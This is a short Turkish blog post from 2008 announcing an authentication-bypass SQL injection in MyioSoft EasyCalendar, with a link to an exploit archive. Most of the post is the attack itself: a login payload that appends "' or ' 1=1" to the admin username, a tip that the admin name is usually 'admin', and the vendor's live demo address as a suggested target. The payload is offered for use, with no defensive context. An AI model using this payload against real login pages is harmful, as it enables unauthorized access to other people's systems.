"Şeytan İçinde ki Sestir; O Sese Kulak Ver"

-Zorlu BUĞRAHAN-

7 Kasım 2008 Cuma

MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability

MyioSoft EasyCalendar (Auth Bypass) Remote SQL Injection Vulnerability

link: http://www.milw0rm.com/exploits/7046

Discovered By: ZoRLu

Exploit:

username: [real_admin_name] ' or ' 1=1 ( you must know admin_name )

password: ZoRLu

note: generally admin name: admin


admin login for demo:

http://myiosoft.com/products/EasyCalendar/demo/


example for demo:

admin: demo1 ' or ' 1=1

passwd: ZoRLu

0 yorum:

 
Dizi